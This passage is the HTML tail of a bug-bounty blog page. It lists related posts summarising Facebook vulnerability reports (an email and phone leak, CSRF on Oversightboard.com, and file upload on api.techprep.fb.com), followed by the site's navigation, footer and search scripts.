  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1624786389"
    data-df="ll"
    >
  Jun 27, 2021
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Disclose unconfirmed email/phone of a Facebook user</h3>
            <div class="text-muted small">
              <p>
                





                Description

This bug could have allowed an attacker to target Facebook users in order to potentially leak unconfirmed emails or phone numbers. A link should be visited by the targeted user in orde...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/oversightboard-com-site-wide-csrf-due-to-missing-checking/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1624786971"
    data-df="ll"
    >
  Jun 27, 2021
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Oversightboard.com site-wide CSRF due to missing checking</h3>
            <div class="text-muted small">
              <p>
                





                Description

This bug could allow an attacker to force a user in Oversightboard.com who visited his website, to make certain requests which would allow the deleting, editing or creating of data. Th...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/uploading-files-to-api-techprep-fb-com/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1548158470"
    data-df="ll"
    >
  Jan 22, 2019
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Uploading files to api.techprep.fb.com</h3>
            <div class="text-muted small">
              <p>
                





                This bug found in one of Facebook domains (api.techprep.fb.com) could allowed an attacker to upload files to the server. All filetypes were supported that could lead to XSS.

Reproduction Instructi...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


    
      
      <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/facebook-account-takeover-due-to-a-bypass-of-allowed-callback-urls-in-the-oauth-flow/" class="btn btn-outline-primary"
    prompt="Older">
    <p>Facebook account takeover due to a bypass of allowed callback URLs in the OAuth flow</p>
  </a>
  

  
  <a href="/posts/account-takeover-of-instagram-accounts-due-to-unrestricted-permissions-of-third-party-ig-applications-generated-tokens/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Account takeover of Instagram accounts due to unrestricted permissions of third-party application&#8217;s generated tokens</p>
  </a>
  

</div>

    
      
      <!--  The comments switcher -->


    
  </div>
</div>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      


















    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    <!-- The Footer -->

<footer>
  <div class="container pl-lg-4 pr-lg-4">
    <div class="d-flex justify-content-between align-items-center text-muted ml-md-3 mr-md-3">
      <div class="footer-left">
        <p class="mb-0">
          © 2025
          <a href="https://www.linkedin.com/in/ysammouda">Youssef Sammouda</a>.
          
          <span data-toggle="tooltip" data-placement="top"
            title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
          
        </p>
      </div>

      <div class="footer-right">
        <p class="mb-0">Using <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
        </p>
      </div>
    </div>
  </div>
</footer>


    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    
      <div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true"
        data-animation="true" data-autohide="false">
        <div class="toast-header">
          <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="toast-body text-center pt-0">
          <p class="pl-2 pr-2 mb-3">A new version of content is available.</p>
          <button type="button" class="btn btn-primary" aria-label="Update">
            Update
          </button>
        </div>
      </div>
    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No results found.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/lazysizes@5.3.2/lazysizes.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js"></script>






  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1.11.6/dayjs.min.js,npm/dayjs@1.11.6/locale/en.min.js,npm/dayjs@1.11.6/plugin/relativeTime.min.js,npm/dayjs@1.11.6/plugin/localizedFormat.min.js"></script>








<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

